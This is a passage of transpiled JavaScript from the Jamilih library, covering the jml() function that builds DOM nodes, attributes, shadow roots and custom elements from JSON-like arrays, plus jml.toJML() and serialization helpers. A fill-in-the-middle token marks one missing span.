ElementContentEditable 'ismap', 'multiple', 'novalidate', 'pattern', 'required', 'spellcheck', // HTMLElement 'translate', // HTMLElement 'value', 'willvalidate']); // Todo: Add more to this as useful for templating // to avoid setting through nullish value var NULLABLES = ['dir', // HTMLElement 'lang', // HTMLElement 'max', 'min', 'title' // HTMLElement ]; var $ = function $(sel) { return doc.querySelector(sel); }; var $$ = function $$(sel) { return [].concat(toConsumableArray(doc.querySelectorAll(sel))); }; /** * Retrieve the (lower-cased) HTML name of a node * @static * @param {Node} node The HTML node * @returns {String} The lower-cased node name */ function _getHTMLNodeName(node) { return node.nodeName && node.nodeName.toLowerCase(); } /** * Apply styles if this is a style tag * @static * @param {Node} node The element to check whether it is a style tag */ function _applyAnyStylesheet(node) { if (!doc.createStyleSheet) { return; } if (_getHTMLNodeName(node) === 'style') { // IE var ss = doc.createStyleSheet(); // Create a stylesheet to actually do something useful ss.cssText = node.cssText; // We continue to add the style tag, however } } /** * Need this function for IE since options weren't otherwise 
getting added * @private * @static * @param {DOMElement} parent The parent to which to append the element * @param {DOMNode} child The element or other node to append to the parent */ function _appendNode(parent, child) { var parentName = _getHTMLNodeName(parent); var childName = _getHTMLNodeName(child); if (doc.createStyleSheet) { if (parentName === 'script') { parent.text = child.nodeValue; return; } if (parentName === 'style') { parent.cssText = child.nodeValue; // This will not apply it--just make it available within the DOM cotents return; } } if (parentName === 'template') { parent.content.appendChild(child); return; } try { parent.appendChild(child); // IE9 is now ok with this } catch (e) { if (parentName === 'select' && childName === 'option') { try { // Since this is now DOM Level 4 standard behavior (and what IE7+ can handle), we try it first parent.add(child); } catch (err) { // DOM Level 2 did require a second argument, so we try it too just in case the user is using an older version of Firefox, etc. parent.add(child, null); // IE7 has a problem with this, but IE8+ is ok } return; } throw e; } } /** * Attach event in a cross-browser fashion * @static * @param {DOMElement} el DOM element to which to attach the event * @param {String} type The DOM event (without 'on') to attach to the element * @param {Function} handler The event handler to attach to the element * @param {Boolean} [capturing] Whether or not the event should be * capturing (W3C-browsers only); default is false; NOT IN USE */ function _addEvent(el, type, handler, capturing) { el.addEventListener(type, handler, !!capturing); } /** * Creates a text node of the result of resolving an entity or character reference * @param {'entity'|'decimal'|'hexadecimal'} type Type of reference * @param {String} prefix Text to prefix immediately after the "&" * @param {String} arg The body of the reference * @returns {Text} The text node of the resolved reference */ function _createSafeReference(type, prefix, arg) { // For security reasons related to innerHTML, we ensure this string only contains potential entity characters if (!arg.match(/^\w+$/)) { throw new TypeError('Bad ' + type); } var elContainer = doc.createElement('div'); // Todo: No workaround for XML? elContainer.textContent = '&' + prefix + arg + ';'; return doc.createTextNode(elContainer.textContent); } /** * @param {String} n0 Whole expression match (including "-") * @param {String} n1 Lower-case letter match * @returns {String} Uppercased letter */ function _upperCase(n0, n1) { return n1.toUpperCase(); } /** * @private * @static */ function _getType(item) { if (typeof item === 'string') { return 'string'; } if ((typeof item === 'undefined' ? 'undefined' : _typeof(item)) === 'object') { if (item === null) { return 'null'; } if (Array.isArray(item)) { return 'array'; } if ('nodeType' in item) { if (item.nodeType === 1) { return 'element'; } if (item.nodeType === 11) { return 'fragment'; } } return 'object'; } return undefined; } /** * @private * @static */ function _fragReducer(frag, node) { frag.appendChild(node); return frag; } /** * @private * @static */ function _replaceDefiner(xmlnsObj) { return function (n0) { var retStr = xmlnsObj[''] ? 
' xmlns="' + xmlnsObj[''] + '"' : n0 || ''; // Preserve XHTML for (var ns in xmlnsObj) { if (xmlnsObj.hasOwnProperty(ns)) { if (ns !== '') { retStr += ' xmlns:' + ns + '="' + xmlnsObj[ns] + '"'; } } } return retStr; }; } function _optsOrUndefinedJML() { for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) { args[_key] = arguments[_key]; } return jml.apply(undefined, toConsumableArray(args[0] === undefined ? args.slice(1) : args)); } /** * @private * @static */ function _jmlSingleArg(arg) { return jml(arg); } /** * @private * @static */ function _copyOrderedAtts(attArr) { var obj = {}; // Todo: Fix if allow prefixed attributes obj[attArr[0]] = attArr[1]; // array of ordered attribute-value arrays return obj; } /** * @private * @static */ function _childrenToJML(node) { return function (childNodeJML, i) { var cn = node.childNodes[i]; var j = Array.isArray(childNodeJML) ? jml.apply(undefined, toConsumableArray(childNodeJML)) : jml(childNodeJML); cn.parentNode.replaceChild(j, cn); }; } /** * @private * @static */ function _appendJML(node) { return function (childJML) { node.appendChild(jml.apply(undefined, toConsumableArray(childJML))); }; } /** * @private * @static */ function _appendJMLOrText(node) { return function (childJML) { if (typeof childJML === 'string') { node.appendChild(doc.createTextNode(childJML)); } else { node.appendChild(jml.apply(undefined, toConsumableArray(childJML))); } }; } /** * @private * @static function _DOMfromJMLOrString (childNodeJML) { if (typeof childNodeJML === 'string') { return doc.createTextNode(childNodeJML); } return jml(...childNodeJML); } */ /** * Creates an XHTML or HTML element (XHTML is preferred, but only in browsers that support); * Any element after element can be omitted, and any subsequent type or types added afterwards * @requires polyfill: Array.isArray * @requires polyfill: Array.prototype.reduce For returning a document fragment * @requires polyfill: Element.prototype.dataset For dataset functionality (Will not work in IE <= 7) * @param {String} el The element to create (by lower-case name) * @param {Object} [atts] Attributes to add with the key as the attribute name and value as the * attribute value; important for IE where the input element's type cannot * be added later after already added to the page * @param {DOMElement[]} [children] The optional children of this element (but raw DOM elements * required to be specified within arrays since * could not otherwise be distinguished from siblings being added) * @param {DOMElement} [parent] The optional parent to which to attach the element (always the last * unless followed by null, in which case it is the second-to-last) * @param {null} [returning] Can use null to indicate an array of elements should be returned * @returns {DOMElement} The newly created (and possibly already appended) element or array of elements */ var jml = function jml() { for (var _len2 = arguments.length, args = Array(_len2), _key2 = 0; _key2 < _len2; _key2++) { args[_key2] = arguments[_key2]; } var elem = doc.createDocumentFragment(); function _checkAtts(atts) { var att = void 0; for (att in atts) { if (!atts.hasOwnProperty(att)) { continue; } var attVal = atts[att]; att = att in ATTR_MAP ? ATTR_MAP[att] : att; if (NULLABLES.includes(att)) { if (attVal != null) { elem[att] = attVal; } continue; } else if (ATTR_DOM.includes(att)) { elem[att] = attVal; continue; } switch (att) { /* Todos: 0. JSON mode to prevent event addition 0. {$xmlDocument: []} // doc.implementation.createDocument 0. 
Accept array for any attribute with first item as prefix and second as value? 0. {$: ['xhtml', 'div']} for prefixed elements case '$': // Element with prefix? nodes[nodes.length] = elem = doc.createElementNS(attVal[0], attVal[1]); break; */ case '#': { // Document fragment nodes[nodes.length] = _optsOrUndefinedJML(opts, attVal); break; }case '$shadow': { var open = attVal.open, closed = attVal.closed; var content = attVal.content, template = attVal.template; var shadowRoot = elem.attachShadow({ mode: closed || open === false ? 'closed' : 'open' }); if (template) { if (Array.isArray(template)) { if (_getType(template[0]) === 'object') { // Has attributes template = jml.apply(undefined, ['template'].concat(toConsumableArray(template), [doc.body])); } else { // Array is for the children template = jml('template', template, doc.body); } } else if (typeof template === 'string') { template = $(template); } jml(template.content.cloneNode(true), shadowRoot); } else { if (!content) { content = open || closed; } if (content && typeof content !== 'boolean') { if (Array.isArray(content)) { jml({ '#': content }, shadowRoot); } else { jml(content, shadowRoot); } } } break; }case 'is': { // Not yet supported in browsers // Handled during element creation break; }case '$custom': { Object.assign(elem, attVal); break; }case '$define': { var _ret = function () { var localName = elem.localName.toLowerCase(); // Note: customized built-ins sadly not working yet var customizedBuiltIn = !localName.includes('-'); var def = customizedBuiltIn ? elem.getAttribute('is') : localName; if (customElements.get(def)) { return 'break'; } var getConstructor = function getConstructor(cb) { var baseClass = options && options.extends ? doc.createElement(options.extends).constructor : customizedBuiltIn ? doc.createElement(localName).constructor : HTMLElement; return cb ? function (_baseClass) { inherits(_class, _baseClass); function _class() { classCallCheck(this, _class); var _this = possibleConstructorReturn(this, (_class.__proto__ || Object.getPrototypeOf(_class)).call(this)); cb.call(_this); return _this; } return _class; }(baseClass) : function (_baseClass2) { inherits(_class2, _baseClass2); function _class2() { classCallCheck(this, _class2); return possibleConstructorReturn(this, (_class2.__proto__ || Object.getPrototypeOf(_class2)).apply(this, arguments)); } return _class2; }(baseClass); }; var constructor = void 0, options = void 0, prototype = void 0; if (Array.isArray(attVal)) { if (attVal.length <= 2) { var _attVal = slicedToArray(attVal, 2); constructor = _attVal[0]; options = _attVal[1]; if (typeof options === 'string') { options = { extends: options }; } else if (!options.hasOwnProperty('extends')) { prototype = options; } if ((typeof constructor === 'undefined' ? 'undefined' : _typeof(constructor)) === 'object') { prototype = constructor; constructor = getConstructor(); } } else { var _attVal2 = slicedToArray(attVal, 3); constructor = _attVal2[0]; prototype = _attVal2[1]; options = _attVal2[2]; if (typeof options === 'string') { options = { extends: options }; } } } else if (typeof attVal === 'function') { constructor = attVal; } else { prototype = attVal; constructor = getConstructor(); } if (!constructor.toString().startsWith('class')) { constructor = getConstructor(constructor); } if (!options && customizedBuiltIn) { options = { extends: localName }; } if (prototype) { Object.assign(constructor.prototype, prototype); } customElements.define(def, constructor, customizedBuiltIn ? 
options : undefined); return 'break'; }(); if (_ret === 'break') break; }case '$symbol': { var _attVal3 = slicedToArray(attVal, 2), symbol = _attVal3[0], func = _attVal3[1]; if (typeof func === 'function') { var funcBound = func.bind(elem); if (typeof symbol === 'string') { elem[Symbol.for(symbol)] = funcBound; } else { elem[symbol] = funcBound; } } else { var obj = func; obj.elem = elem; if (typeof symbol === 'string') { elem[Symbol.for(symbol)] = obj; } else { elem[symbol] = obj; } } break; }case '$data': { setMap(attVal); break; }case '$attribute': { // Attribute node var node = attVal.length === 3 ? doc.createAttributeNS(attVal[0], attVal[1]) : doc.createAttribute(attVal[0]); node.value = attVal[attVal.length - 1]; nodes[nodes.length] = node; break; }case '$text': { // Todo: Also allow as jml(['a text node']) (or should that become a fragment)? var _node = doc.createTextNode(attVal); nodes[nodes.length] = _node; break; }case '$document': { // Todo: Conditionally create XML document var _node2 = doc.implementation.createHTMLDocument(); if (attVal.childNodes) { attVal.childNodes.forEach(_childrenToJML(_node2)); // Remove any extra nodes created by createHTMLDocument(); removing a node shifts later siblings down, so keep checking the same index. var j = attVal.childNodes.length; while (_node2.childNodes[j]) { var cn = _node2.childNodes[j]; cn.parentNode.removeChild(cn); } } else { if (attVal.$DOCTYPE) { var dt = { $DOCTYPE: attVal.$DOCTYPE }; var doctype = jml(dt); _node2.firstChild.replaceWith(doctype); } var html = _node2.childNodes[1]; var head = html.childNodes[0]; var _body = html.childNodes[1]; if (attVal.title || attVal.head) { var meta = doc.createElement('meta'); meta.setAttribute('charset', 'utf-8'); head.appendChild(meta); } if (attVal.title) { _node2.title = attVal.title; // Appends after meta } if (attVal.head) { attVal.head.forEach(_appendJML(head)); } if (attVal.body) { attVal.body.forEach(_appendJMLOrText(_body)); } } nodes[nodes.length] = _node2; break; }case '$DOCTYPE': { /* // Todo: if (attVal.internalSubset) { node = {}; } else */ var _node3 = void 0; if (attVal.entities || attVal.notations) { _node3 = { name: attVal.name, nodeName: attVal.name, nodeValue: null, nodeType: 10, entities: attVal.entities.map(_jmlSingleArg), notations: attVal.notations.map(_jmlSingleArg), publicId: attVal.publicId, systemId: attVal.systemId // internalSubset: // Todo }; } else { _node3 = doc.implementation.createDocumentType(attVal.name, attVal.publicId || '', attVal.systemId || ''); } nodes[nodes.length] = _node3; break; }case '$ENTITY': { /* // Todo: Should we auto-copy another node's properties/methods (like DocumentType) excluding or changing its non-entity node values? const node = { nodeName: attVal.name, nodeValue: null, publicId: attVal.publicId, systemId: attVal.systemId, notationName: attVal.notationName, nodeType: 6, childNodes: attVal.childNodes.map(_DOMfromJMLOrString) }; */ break; }case '$NOTATION': { // Todo: We could add further properties/methods, but unlikely to be used as is.
var _node4 = { nodeName: attVal[0], publicID: attVal[1], systemID: attVal[2], nodeValue: null, nodeType: 12 }; nodes[nodes.length] = _node4; break; }case '$on': { // Events for (var p2 in attVal) { if (attVal.hasOwnProperty(p2)) { var val = attVal[p2]; if (typeof val === 'function') { val = [val, false]; } if (typeof val[0] === 'function') { _addEvent(elem, p2, val[0], val[1]); // element, event name, handler, capturing } } } break; }case 'className':case 'class': if (attVal != null) { elem.className = attVal; } break; case 'dataset': { var _ret2 = function () { // Map can be keyed with hyphenated or camel-cased properties var recurse = function recurse(attVal, startProp) { var prop = ''; var pastInitialProp = startProp !== ''; Object.keys(attVal).forEach(function (key) { var value = attVal[key]; if (pastInitialProp) { prop = startProp + key.replace(hyphenForCamelCase, _upperCase).replace(/^([a-z])/, _upperCase); } else { prop = startProp + key.replace(hyphenForCamelCase, _upperCase); } if (value === null || (typeof value === 'undefined' ? 'undefined' : _typeof(value)) !== 'object') { if (value != null) { elem.dataset[prop] = value; } prop = startProp; return; } recurse(value, prop); }); }; recurse(attVal, ''); return 'break'; // Todo: Disable this by default unless configuration explicitly allows (for security) }(); break; } case 'htmlFor':case 'for': if (elStr === 'label') { if (attVal != null) { elem.htmlFor = attVal; } break; } elem.setAttribute(att, attVal); break; case 'xmlns': // Already handled break; default: if (att.match(/^on/)) { elem[att] = attVal; // _addEvent(elem, att.slice(2), attVal, false); // This worked, but perhaps the user wishes only one event break; } if (att === 'style') { if (attVal == null) { break; } if ((typeof attVal === 'undefined' ? 
'undefined' : _typeof(attVal)) === 'object') { for (var _p in attVal) { if (attVal.hasOwnProperty(_p) && attVal[_p] != null) { // Todo: Handle aggregate properties like "border" if (_p === 'float') { elem.style.cssFloat = attVal[_p]; elem.style.styleFloat = attVal[_p]; // Harmless though we could make conditional on older IE instead } else { elem.style[_p.replace(hyphenForCamelCase, _upperCase)] = attVal[_p]; } } } break; } // setAttribute unfortunately erases any existing styles elem.setAttribute(att, attVal); /* // The following reorders which is troublesome for serialization, e.g., as used in our testing if (elem.style.cssText !== undefined) { elem.style.cssText += attVal; } else { // Opera elem.style += attVal; } */ break; } var matchingPlugin = opts && opts.$plugins && opts.$plugins.find(function (p) { return p.name === att; }); if (matchingPlugin) { matchingPlugin.set({ element: elem, attribute: { name: att, value: attVal } }); break; } elem.setAttribute(att, attVal); break; } } } var nodes = []; var elStr = void 0; var opts = void 0; var isRoot = false; if (_getType(args[0]) === 'object' && Object.keys(args[0]).some(function (key) { return possibleOptions.includes(key); })) { opts = args[0]; if (opts.state !== 'child') { isRoot = true; opts.state = 'child'; } if (opts.$map && !opts.$map.root && opts.$map.root !== false) { opts.$map = { root: opts.$map }; } if ('$plugins' in opts) { if (!Array.isArray(opts.$plugins)) { throw new Error('$plugins must be an array'); } opts.$plugins.forEach(function (pluginObj) { if (!pluginObj) { throw new TypeError('Plugin must be an object'); } if (!pluginObj.name || !pluginObj.name.startsWith('$_')) { throw new TypeError('Plugin object name must be present and begin with `$_`'); } if (typeof pluginObj.set !== 'function') { throw new TypeError('Plugin object must have a `set` method'); } }); } args = args.slice(1); } var argc = args.length; var defaultMap = opts && opts.$map && opts.$map.root; var setMap = function setMap(dataVal) { var map = void 0, obj = void 0; // Boolean indicating use of default map and object if (dataVal === true) { var _defaultMap = slicedToArray(defaultMap, 2); map = _defaultMap[0]; obj = _defaultMap[1]; } else if (Array.isArray(dataVal)) { // Array of strings mapping to default if (typeof dataVal[0] === 'string') { dataVal.forEach(function (dVal) { setMap(opts.$map[dVal]); }); // Array of Map and non-map data object } else { map = dataVal[0] || defaultMap[0]; obj = dataVal[1] || defaultMap[1]; } // Map } else if (/^\[object (?:Weak)?Map\]$/.test([].toString.call(dataVal))) { map = dataVal; obj = defaultMap[1]; // Non-map data object } else { map = defaultMap[0]; obj = dataVal; } map.set(elem, obj); }; for (var i = 0; i < argc; i++) { var arg = args[i]; switch (_getType(arg)) { case 'null': // null always indicates a place-holder (only needed for last argument if want array returned) if (i === argc - 1) { _applyAnyStylesheet(nodes[0]); // We have to execute any stylesheets even if not appending or otherwise IE will never apply them // Todo: Fix to allow application of stylesheets of style tags within fragments? return nodes.length <= 1 ? nodes[0] : nodes.reduce(_fragReducer, doc.createDocumentFragment()); // nodes; } break; case 'string': // Strings indicate elements switch (arg) { case '!': nodes[nodes.length] = doc.createComment(args[++i]); break; case '?': arg = args[++i]; var procValue = args[++i]; var val = procValue; if ((typeof val === 'undefined' ? 
'undefined' : _typeof(val)) === 'object') { procValue = []; for (var p in val) { if (val.hasOwnProperty(p)) { procValue.push(p + '=' + '"' + // https://www.w3.org/TR/xml-stylesheet/#NT-PseudoAttValue val[p].replace(/"/g, '&quot;') + '"'); } } procValue = procValue.join(' '); } // Firefox allows instructions with ">" in this method, but not if placed directly! try { nodes[nodes.length] = doc.createProcessingInstruction(arg, procValue); } catch (e) { // Getting NotSupportedError in IE, so we try to imitate a processing instruction with a comment // innerHTML didn't work // var elContainer = doc.createElement('div'); // elContainer.textContent = '<?' + doc.createTextNode(arg + ' ' + procValue).nodeValue + '?>'; // nodes[nodes.length] = elContainer.textContent; // Todo: any other way to resolve? Just use XML? nodes[nodes.length] = doc.createComment('?' + arg + ' ' + procValue + '?'); } break; // Browsers don't support doc.createEntityReference, so we just use this as a convenience case '&': nodes[nodes.length] = _createSafeReference('entity', '', args[++i]); break; case '#': // // Decimal character reference - ['#', '01234'] // &#01234; // probably easier to use JavaScript Unicode escapes nodes[nodes.length] = _createSafeReference('decimal', arg, String(args[++i])); break; case '#x': // Hex character reference - ['#x', '123a'] // &#x123a; // probably easier to use JavaScript Unicode escapes nodes[nodes.length] = _createSafeReference('hexadecimal', arg, args[++i]); break; case '![': // '![', ['escaped <&> text'] // <![CDATA[escaped <&> text]]> // CDATA valid in XML only, so we'll just treat as text for mutual compatibility // Todo: config (or detection via some kind of doc.documentType property?) of whether in XML try { nodes[nodes.length] = doc.createCDATASection(args[++i]); } catch (e2) { nodes[nodes.length] = doc.createTextNode(args[i]); // i already incremented } break; case '': nodes[nodes.length] = doc.createDocumentFragment(); break; default: { // An element elStr = arg; var _atts = args[i + 1]; // Todo: Fix this to depend on XML/config, not availability of methods if (_getType(_atts) === 'object' && _atts.is) { var is = _atts.is; if (doc.createElementNS) { elem = doc.createElementNS(NS_HTML, elStr, { is: is }); } else { elem = doc.createElement(elStr, { is: is }); } } else { if (doc.createElementNS) { elem = doc.createElementNS(NS_HTML, elStr); } else { elem = doc.createElement(elStr); } } nodes[nodes.length] = elem; // Add to parent break; } } break; case 'object': // Non-DOM-element objects indicate attribute-value pairs var atts = arg; if (atts.xmlns !== undefined) { // We handle this here, as otherwise may lose events, etc. // As namespace of element already set as XHTML, we need to change the namespace // elem.setAttribute('xmlns', atts.xmlns); // Doesn't work // Can't set namespaceURI dynamically, renameNode() is not supported, and setAttribute() doesn't work to change the namespace, so we resort to this hack var replacer = void 0; if (_typeof(atts.xmlns) === 'object') { replacer = _replaceDefiner(atts.xmlns); } else { replacer = ' xmlns="' + atts.xmlns + '"'; } // try { // Also fix DOMParser to work with text/html elem = nodes[nodes.length - 1] = new DOMParser().parseFromString(new XmlSerializer().serializeToString(elem) // Mozilla adds XHTML namespace .replace(' xmlns="' + NS_HTML + '"', replacer), 'application/xml').documentElement; // }catch(e) {alert(elem.outerHTML);throw e;} } var orderedArr = atts.$a ? 
atts.$a.map(_copyOrderedAtts) : [atts]; orderedArr.forEach(_checkAtts); break; case 'fragment': case 'element': /* 1) Last element always the parent (put null if don't want parent and want to return array) unless only atts and children (no other elements) 2) Individual elements (DOM elements or sequences of string[/object/array]) get added to parent first-in, first-added */ if (i === 0) { // Allow wrapping of element elem = arg; } if (i === argc - 1 || i === argc - 2 && args[i + 1] === null) { // parent var elsl = nodes.length; for (var k = 0; k < elsl; k++) { _appendNode(arg, nodes[k]); } // Todo: Apply stylesheets if any style tags were added elsewhere besides the first element? _applyAnyStylesheet(nodes[0]); // We have to execute any stylesheets even if not appending or otherwise IE will never apply them } else { nodes[nodes.length] = arg; } break; case 'array': // Arrays or arrays of arrays indicate child nodes var child = arg; var cl = child.length; for (var j = 0; j < cl; j++) { // Go through children array container to handle elements var childContent = child[j]; var childContentType = typeof childContent === 'undefined' ? 'undefined' : _typeof(childContent); if (childContent === undefined) { throw String('Parent array:' + JSON.stringify(args) + '; child: ' + child + '; index:' + j); } switch (childContentType) { // Todo: determine whether null or function should have special handling or be converted to text case 'string':case 'number':case 'boolean': _appendNode(elem, doc.createTextNode(childContent)); break; default: if (Array.isArray(childContent)) { // Arrays representing child elements _appendNode(elem, _optsOrUndefinedJML.apply(undefined, [opts].concat(toConsumableArray(childContent)))); } else if (childContent['#']) { // Fragment _appendNode(elem, _optsOrUndefinedJML(opts, childContent['#'])); } else { // Single DOM element children _appendNode(elem, childContent); } break; } } break; } } var ret = nodes[0] || elem; if (opts && isRoot && opts.$map && opts.$map.root) { setMap(true); } return ret; }; /** * Converts a DOM object or a string of HTML into a Jamilih object (or string) * @param {string|HTMLElement} [dom=document.documentElement] Defaults to converting the current document. * @param {object} [config={stringOutput:false}] Configuration object * @param {boolean} [config.stringOutput=false] Whether to output the Jamilih object as a string. * @returns {array|string} Array containing the elements which represent a Jamilih object, or, if `stringOutput` is true, it will be the stringified version of such an object */ jml.toJML = function (dom, config) { config = config || { stringOutput: false }; if (typeof dom === 'string') { dom = new DOMParser().parseFromString(dom, 'text/html'); // todo: Give option for XML once implemented and change JSDoc to allow for Element } var ret = []; var parent = ret; var parentIdx = 0; function invalidStateError() { // These are probably only necessary if working with text/html function DOMException() { return this; } { // INVALID_STATE_ERR per section 9.3 XHTML 5: http://www.w3.org/TR/html5/the-xhtml-syntax.html // Since we can't instantiate without this (at least in Mozilla), this mimics at least (good idea?)
var e = new DOMException(); e.code = 11; throw e; } } function addExternalID(obj, node) { if (node.systemId.includes('"') && node.systemId.includes("'")) { invalidStateError(); } var publicId = node.publicId; var systemId = node.systemId; if (systemId) { obj.systemId = systemId; } if (publicId) { obj.publicId = publicId; } } function set$$1(val) { parent[parentIdx] = val; parentIdx++; } function setChildren() { set$$1([]); parent = parent[parentIdx - 1]; parentIdx = 0; } function setObj(prop1, prop2) { parent = parent[parentIdx - 1][prop1]; parentIdx = 0; if (prop2) { parent = parent[prop2]; } } function parseDOM(node, namespaces) { // namespaces = clone(namespaces) || {}; // Ensure we're working with a copy, so different levels in the hierarchy can treat it differently /* if ((node.prefix && node.prefix.includes(':')) || (node.localName && node.localName.includes(':'))) { invalidStateError(); } */ var type = 'nodeType' in node ? node.nodeType : null; namespaces = Object.assign({}, namespaces); var xmlChars = /([\u0009\u000A\u000D\u0020-\uD7FF\uE000-\uFFFD]|[\uD800-\uDBFF][\uDC00-\uDFFF])*$/; // eslint-disable-line no-control-regex if ([2, 3, 4, 7, 8].includes(type) && !xmlChars.test(node.nodeValue)) { invalidStateError(); } var children = void 0, start = void 0, tmpParent = void 0, tmpParentIdx = void 0; function setTemp() { tmpParent = parent; tmpParentIdx = parentIdx; } function resetTemp() { parent = tmpParent; parentIdx = tmpParentIdx; parentIdx++; // Increment index in parent container of this element } switch (type) { case 1: // ELEMENT setTemp(); var nodeName = node.nodeName.toLowerCase(); // Todo: for XML, should not lower-case setChildren(); // Build child array since elements are, except at the top level, encapsulated in arrays set$$1(nodeName); start = {}; var hasNamespaceDeclaration = false; if (namespaces[node.prefix || ''] !== node.namespaceURI) { namespaces[node.prefix || ''] = node.namespaceURI; if (node.prefix) { start['xmlns:' + node.prefix] = node.namespaceURI; } else if (node.namespaceURI) { start.xmlns = node.namespaceURI; } hasNamespaceDeclaration = true; } if (node.attributes.length) { set$$1(Array.from(node.attributes).reduce(function (obj, att) { obj[att.name] = att.value; // Attr.nodeName and Attr.nodeValue are deprecated as of DOM4 as Attr no longer inherits from Node, so we can safely use name and value return obj; }, start)); } else if (hasNamespaceDeclaration) { set$$1(start); } children = node.childNodes; if (children.length) { setChildren(); // Element children array container Array.from(children).forEach(function (childNode) { parseDOM(childNode, namespaces); }); } resetTemp(); break; case undefined: // Treat as attribute node until this is fixed: https://github.com/tmpvar/jsdom/issues/1641 / https://github.com/tmpvar/jsdom/pull/1822 case 2: // ATTRIBUTE (should only get here if passing in an attribute node) set$$1({ $attribute: [node.namespaceURI, node.name, node.value] }); break; case 3: // TEXT if (config.stripWhitespace && /^\s+$/.test(node.nodeValue)) { return; } set$$1(node.nodeValue); break; case 4: // CDATA if (node.nodeValue.includes(']]' + '>')) { invalidStateError(); } set$$1(['![', node.nodeValue]); break; case 5: // ENTITY REFERENCE (probably not used in browsers since already resolved) set$$1(['&', node.nodeName]); break; case 6: // ENTITY (would need to pass in directly) setTemp(); start = {}; if (node.xmlEncoding || node.xmlVersion) { // an external entity file? 
start.$ENTITY = { name: node.nodeName, version: node.xmlVersion, encoding: node.xmlEncoding }; } else { start.$ENTITY = { name: node.nodeName }; if (node.publicId || node.systemId) { // External Entity? addExternalID(start.$ENTITY, node); if (node.notationName) { start.$ENTITY.NDATA = node.notationName; } } } set$$1(start); children = node.childNodes; if (children.length) { start.$ENTITY.childNodes = []; // Set position to $ENTITY's childNodes array children setObj('$ENTITY', 'childNodes'); Array.from(children).forEach(function (childNode) { parseDOM(childNode, namespaces); }); } resetTemp(); break; case 7: // PROCESSING INSTRUCTION if (/^xml$/i.test(node.target)) { invalidStateError(); } if (node.target.includes('?>')) { invalidStateError(); } if (node.target.includes(':')) { invalidStateError(); } if (node.data.includes('?>')) { invalidStateError(); } set$$1(['?', node.target, node.data]); // Todo: Could give option to attempt to convert value back into object if has pseudo-attributes break; case 8: // COMMENT if (node.nodeValue.includes('--') || node.nodeValue.length && node.nodeValue.lastIndexOf('-') === node.nodeValue.length - 1) { invalidStateError(); } set$$1(['!', node.nodeValue]); break; case 9: // DOCUMENT setTemp(); var docObj = { $document: { childNodes: [] } }; if (config.xmlDeclaration) { docObj.$document.xmlDeclaration = { version: doc.xmlVersion, encoding: doc.xmlEncoding, standAlone: doc.xmlStandalone }; } set$$1(docObj); // doc.implementation.createHTMLDocument // Set position to fragment's array children setObj('$document', 'childNodes'); children = node.childNodes; if (!children.length) { invalidStateError(); } // set({$xmlDocument: []}); // doc.implementation.createDocument // Todo: use this conditionally Array.from(children).forEach(function (childNode) { // Can't just do documentElement as there may be doctype, comments, etc. // No need for setChildren, as we have already built the container array parseDOM(childNode, namespaces); }); resetTemp(); break; case 10: // DOCUMENT TYPE setTemp(); // Can create directly by doc.implementation.createDocumentType start = { $DOCTYPE: { name: node.name } }; if (node.internalSubset) { start.internalSubset = node.internalSubset; } var pubIdChar = /^(\u0020|\u000D|\u000A|[a-zA-Z0-9]|[-'()+,./:=?;!*#@$_%])*$/; // eslint-disable-line no-control-regex if (!pubIdChar.test(node.publicId)) { invalidStateError(); } addExternalID(start.$DOCTYPE, node); // Fit in internal subset along with entities?: probably don't need as these would only differ if from DTD, and we're not rebuilding the DTD set$$1(start); // Auto-generate the internalSubset instead? Avoid entities/notations in favor of array to preserve order? 
var entities = node.entities; // Currently deprecated if (entities && entities.length) { start.$DOCTYPE.entities = []; setObj('$DOCTYPE', 'entities'); Array.from(entities).forEach(function (entity) { parseDOM(entity, namespaces); }); // Reset for notations parent = tmpParent; parentIdx = tmpParentIdx + 1; } var notations = node.notations; // Currently deprecated if (notations && notations.length) { start.$DOCTYPE.notations = []; setObj('$DOCTYPE', 'notations'); Array.from(notations).forEach(function (notation) { parseDOM(notation, namespaces); }); } resetTemp(); break; case 11: // DOCUMENT FRAGMENT setTemp(); set$$1({ '#': [] }); // Set position to fragment's array children setObj('#'); children = node.childNodes; Array.from(children).forEach(function (childNode) { // No need for setChildren, as we have already built the container array parseDOM(childNode, namespaces); }); resetTemp(); break; case 12: // NOTATION start = { $NOTATION: { name: node.nodeName } }; addExternalID(start.$NOTATION, node); set$$1(start); break; default: throw new TypeError('Not an XML type'); } } parseDOM(dom, {}); if (config.stringOutput) { return JSON.stringify(ret[0]); } return ret[0]; }; jml.toJMLString = function (dom, config) { return jml.toJML(dom, Object.assign(config || {}, { stringOutput: true })); };<|fim▁hole|> // Alias for jml() return jml.apply(undefined, arguments); }; jml.toHTML = function () { // Todo: Replace this with version of jml() that directly builds a string var ret = jml.apply(undefined, arguments); // Todo: deal with serialization of properties like 'selected', 'checked', 'value', 'defaultValue', 'for', 'dataset', 'on*', 'style'! (i.e., need to build a string ourselves) return ret.outerHTML; }; jml.toDOMString = function () { // Alias for jml.toHTML for parity with jml.toJMLString return jml.toHTML.apply(jml, arguments); }; jml.toXML = function () { var ret = jml.apply(undefined, arguments); return new XmlSerializer().serializeToString(ret); }; jml.toXMLDOMString = function () { // Alias for jml.toXML for parity with jml.toJMLString return jml.toXML.apply(jml, arguments); }; var JamilihMap = function (_Map) { inherits(JamilihMap, _Map); function JamilihMap() { classCallCheck(this, JamilihMap); return possibleConstructorReturn(this, (JamilihMap.__proto__ || Object.getPrototypeOf(JamilihMap)).apply(this, arguments)); } createClass(JamilihMap, [{ key: 'get', value: function get$$1(elem) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihMap.prototype.__proto__ || Object.getPrototypeOf(JamilihMap.prototype), 'get', this).call(this, elem); } }, { key: 'set', value: function set$$1(elem, value) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihMap.prototype.__proto__ || Object.getPrototypeOf(JamilihMap.prototype), 'set', this).call(this, elem, value); } }, { key: 'invoke', value: function invoke(elem, methodName) { var _get; elem = typeof elem === 'string' ? $(elem) : elem; for (var _len3 = arguments.length, args = Array(_len3 > 2 ? 
